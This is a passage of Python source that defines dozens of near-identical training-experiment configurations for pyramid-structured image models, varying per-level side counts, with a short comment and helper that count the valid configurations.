ch032_1side_5__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s3__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_3__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s4__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_4__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s5__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_5_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s5__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_5_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s5__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_5_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s5__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_5_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s5__3s5__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_5__3side_5_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
# 1 3 6 10 15 "21" 28 36 45 55
# side6 OK 56
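# --- Hedged sketch (editor's illustration; nothing in the pipeline calls it) ---
# The tallies above follow from the pyramid constraint 1side >= 2side >= 3side >= 4side:
# for a fixed 1side = n, the legal (2side, 3side, 4side) triples number the sum of the
# first n triangular numbers. The hypothetical helper below just reproduces the hand
# counts, e.g. _pyramid_combo_count(6) == 56 and _pyramid_combo_count(7) == 84.
def _pyramid_combo_count(n_1side):
    return sum(1
               for s2 in range(1, n_1side + 1)
               for s3 in range(1, s2 + 1)
               for s4 in range(1, s3 + 1))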
ch032_1side_6__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s1__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_1__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_2__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s2__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_2__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_2__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s2__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_2__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_2__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_2__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s2__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_2__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_3__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_3__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s3__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_3__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_3__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s3__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_3__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_3__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s3__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_3__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_3__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s3__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_3__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_3__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s3__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_3__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_3__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s3__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_3__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_4__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_4__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s4__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_4__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
